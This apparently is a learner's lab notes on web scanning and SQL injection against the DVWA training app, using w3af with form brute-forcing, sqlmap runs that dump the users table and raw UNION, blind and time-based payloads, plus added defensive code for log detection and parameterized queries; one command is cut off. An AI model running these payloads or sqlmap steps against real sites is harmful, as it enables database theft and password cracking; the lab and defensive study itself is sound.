p128 WMAP
Like yesterday, when I use these vulnerability scanning tools to scan testfire.net or OWASPBWA, they can't find the vulnerabilities! I don't understand!
Update: the network had dropped at some point without my noticing. After reconnecting, the scan succeeded:
p134 The scanning tool w3af
# w3af_console
w3af>>> plugins
w3af/plugins>>> bruteforce form_auth
w3af/plugins>>> bruteforce config form_auth
w3af/plugins/bruteforce/config:form_auth>>> set passwdFile /usr/share/w3af/w3af/core/controllers/bruteforce/passwords.txt
w3af/plugins/bruteforce/config:form_auth>>> set usersFile /usr/share/w3af/w3af/core/controllers/bruteforce/users.txt
w3af/plugins/bruteforce/config:form_auth>>> back
w3af/plugins>>> audit xss sqli
w3af/plugins>>> discovery webspider
Unknown command 'discovery'
w3af/plugins>>> help
|-----------------------------------------------------------------------------|
| list           | List available plugins.                                    |
|-----------------------------------------------------------------------------|
| back           | Go to the previous menu.                                   |
| exit           | Exit w3af.                                                 |
|-----------------------------------------------------------------------------|
| audit          | View, configure and enable audit plugins                   |
| infrastructure | View, configure and enable infrastructure plugins          |
| grep           | View, configure and enable grep plugins                    |
| crawl          | View, configure and enable crawl plugins                   |
| evasion        | View, configure and enable evasion plugins                 |
| bruteforce     | View, configure and enable bruteforce plugins              |
| auth           | View, configure and enable auth plugins                    |
| output         | View, configure and enable output plugins                  |
| mangle         | View, configure and enable mangle plugins                  |
|-----------------------------------------------------------------------------|
It seems the discovery module from the book no longer exists. Checking online: the discovery module was renamed to the crawl module. Go on:
w3af/plugins>>> crawl web_spider
w3af/plugins>>> crawl config web_spider
w3af/plugins/crawl/config:web_spider>>> set only_forward True
w3af/plugins/crawl/config:web_spider>>> back
The configuration has been saved.
w3af/plugins>>> back
Basic plugin configuration complete! Next, configure the scan target and the output format for the results:
w3af>>> target
w3af/config:target>>> set target http://www.dvssc.com/dvwa/index.php
w3af/config:target>>> back
The configuration has been saved.
w3af>>> plugins
w3af/plugins>>> output html_file
w3af/plugins>>> output config html_file
w3af/plugins/output/config:html_file>>> set verbose True
w3af/plugins/output/config:html_file>>> back
The configuration has been saved.
w3af/plugins>>> back
w3af>>> start
Scan results:
p137 SQL Injection Vulnerability detection
In Kali 2.0:
msf > use auxiliary/scanner/http/sqlmap
[-] Failed to load module: auxiliary/scanner/http/sqlmap
It seems the module has been removed. Simply use sqlmap directly from the terminal.
Install a Firefox add-on called Tamper Data, which can be used to view and change the parameters the web app submits in the background, such as POST parameters, cookie values, and so on.
Log in to dvssc.com as admin and open the SQL injection training page.
Submit arbitrary data, use Tamper Data to capture the URL and cookie, and then run:
# sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=a&Submit=Submit#' --cookie='security=low; PHPSESSID=ov3jmigsemo6d47367co53qq24'
Results:
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=-3209' OR 1543=1543#&Submit=Submit

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: id=-3023' OR 1 GROUP BY CONCAT(0x7178716a71,(SELECT (CASE WHEN (4203=4203) THEN 1 ELSE 0 END)),0x7178627671,FLOOR(RAND(0))) HAVING MIN(0)#&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0 AND time-based blind (SELECT comment)
    Payload: id=a' AND (SELECT * FROM (SELECT(SLEEP(5)))fhge)#&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=a' UNION ALL SELECT CONCAT(0x7178716a71,0x4e4b7872695163554f65444d6e4a4f59764f54616879767062516e576373624d726e545a6b727472,0x7178627671),NULL#&Submit=Submit
---
[INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2
back-end DBMS: MySQL 5.0
[INFO] fetched data logged to text files under '/root/.sqlmap/output/www.dvssc.com'
[*] shutting down
Next, find out which MySQL database holds the web app's data. Simply append --dbs (enumerate database names) and -v 0 (verbosity level) to the previous command:
# sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=bb&Submit=Submit#' --cookie='security=low; PHPSESSID=ov3jmigsemo6d47367co53qq24' --dbs -v 0
--snip--
available databases [2]:
[*] dvwa
[*] information_schema
information_schema is MySQL's default system database, so focus on dvwa and enumerate the tables it contains:
# sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=bb&Submit=Submit#' --cookie='security=low; PHPSESSID=ov3jmigsemo6d47367co53qq24' -D dvwa --tables
--snip--
[INFO] fetching tables for database 'dvwa'
[WARNING] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+
Enumerate the columns of users and find that there is a password column, haha! Dump its contents:
# sqlmap -u "http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=bb&Submit=Submit#" --cookie='
Open users.csv: the admin's password is stored as an MD5 hash; Google the hash and you'll know the admin's password.
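From the defender's side, the sqlmap run above leaves a recognisable trail in the web server's access log: the boolean `' OR n=n`, the `SLEEP()` delay and the `UNION ALL SELECT CONCAT(0x...)` payloads all arrive in the query string. The following is an added example, not part of the original post or of sqlmap; it runs a few regex rules over constructed Apache-style log lines (sample data, not the page's scan) to flag those request patterns.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the page's scan); the query
# strings mirror the sqlmap payload types reported above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2016:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 1532
10.0.0.5 - - [01/Jan/2016:10:00:02 +0000] "GET /dvwa/vulnerabilities/sqli/?id=-3209%27%20OR%201543%3D1543%23&Submit=Submit HTTP/1.1" 200 1601
10.0.0.5 - - [01/Jan/2016:10:00:03 +0000] "GET /dvwa/vulnerabilities/sqli/?id=a%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29fhge%29%23&Submit=Submit HTTP/1.1" 200 1532
10.0.0.5 - - [01/Jan/2016:10:00:09 +0000] "GET /dvwa/vulnerabilities/sqli/?id=a%27%20UNION%20ALL%20SELECT%20CONCAT%280x7178716a71%2C0x4e4b%2C0x7178627671%29%2CNULL%23&Submit=Submit HTTP/1.1" 200 1700
10.0.0.7 - - [01/Jan/2016:10:01:00 +0000] "GET /dvwa/index.php HTTP/1.1" 200 900
"""

# Each rule is (name, regex applied to the URL-decoded query string).
RULES = [
    ("boolean_blind", re.compile(r"'\s*(OR|AND)\s+\d+\s*=\s*\d+", re.I)),
    ("time_blind", re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I)),
    ("union_query", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    # sqlmap wraps extracted data in hex marker strings (0x7178716a71 in the output above)
    ("hex_marker", re.compile(r"\bCONCAT\s*\(\s*0x[0-9a-f]+", re.I)),
]

REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)')

def classify_line(line):
    """Return (ip, path-without-query, [matched rule names]) for one access-log line, or None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    path = m.group("path")
    query = unquote_plus(path.split("?", 1)[1]) if "?" in path else ""
    hits = [name for name, rx in RULES if rx.search(query)]
    return m.group("ip"), path.split("?", 1)[0], hits

def find_injection_attempts(log_text):
    """Return only the parsed lines that match at least one rule."""
    out = []
    for line in log_text.splitlines():
        parsed = classify_line(line)
        if parsed and parsed[2]:
            out.append(parsed)
    return out

if __name__ == "__main__":
    for ip, path, hits in find_injection_attempts(SAMPLE_LOG):
        print(f"{ip} {path} -> {', '.join(hits)}")
```

Decoding the query string before matching matters: the same payloads arrive percent-encoded, as in the sample lines, and a rule applied to the raw path would miss them.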
p150 SQL injection case analysis
Log in to www.dvssc.com's SQL injection training page, first setting the security level to low.
When using UNION injection, if the number of columns differs from that of the original query, MySQL reports an error. For example, injecting
' UNION SELECT 1,2,3-- '
gives the error:
The used SELECT statements have a different number of columns
Continuing, by querying the INFORMATION_SCHEMA system tables you can see the name of every table in the MySQL database, the name of every column, and so on:
(Note: there must be a space between the trailing comment marker -- and the closing quote ' !)
' UNION SELECT 1, column_name FROM information_schema.columns WHERE table_name='users'-- '
' UNION SELECT 1, password FROM users-- '
' UNION SELECT password, concat(first_name, ' ', last_name, ' ', user) FROM users-- ' (use the concat() function to pull back more information in one go)
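Both findings on this page (the column-count error and the `' UNION SELECT 1, password FROM users-- '` payload) come from the same root cause: the id is pasted into the SQL text. The following is an added example, not part of the original post or of DVWA; it rebuilds a DVWA-style users lookup on an in-memory SQLite table (constructed rows, placeholder hashes) and puts the vulnerable string-concatenation query beside the parameterized form, so you can see the page's payload leak every hash from one and match nothing in the other.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the DVWA users table (sample rows, placeholder hashes)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, user TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?,?,?,?,?)", [
        (1, "admin", "admin", "admin", "<placeholder-md5-1>"),
        (2, "Gordon", "Brown", "gordonb", "<placeholder-md5-2>"),
    ])
    return db

def lookup_vulnerable(db, user_id):
    """DVWA 'low' style: the id is pasted straight into the SQL text."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return db.execute(sql).fetchall()

def lookup_parameterized(db, user_id):
    """Hardened form: the id is bound as a value, so quotes and UNION inside it are just characters."""
    return db.execute("SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)).fetchall()

def union_error_for_width(db, n):
    """The column-count check from the page: the DB error text for an n-column UNION, or None if it ran."""
    payload = "' UNION SELECT " + ",".join(str(i) for i in range(1, n + 1)) + "-- "
    try:
        lookup_vulnerable(db, payload)
        return None
    except sqlite3.OperationalError as e:
        return str(e)  # this is the text a verbose app would echo back to the browser

# The page's payload; the space after -- is required by MySQL (SQLite accepts it too).
PAYLOAD_PASSWORDS = "' UNION SELECT 1, password FROM users-- "

if __name__ == "__main__":
    db = make_db()
    print(union_error_for_width(db, 3))                 # wrong width: the DB error would reach the user
    print(lookup_vulnerable(db, PAYLOAD_PASSWORDS))     # every password hash comes back
    print(lookup_parameterized(db, PAYLOAD_PASSWORDS))  # []: the payload matched nothing as a literal id
```

Two fixes follow from the demonstration: bind user input as parameters, and never echo the database's error text to the client, since that text is what tells a tester the UNION width is wrong.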
Chapter 4 of the Metasploit Devil Training Camp (Part 1)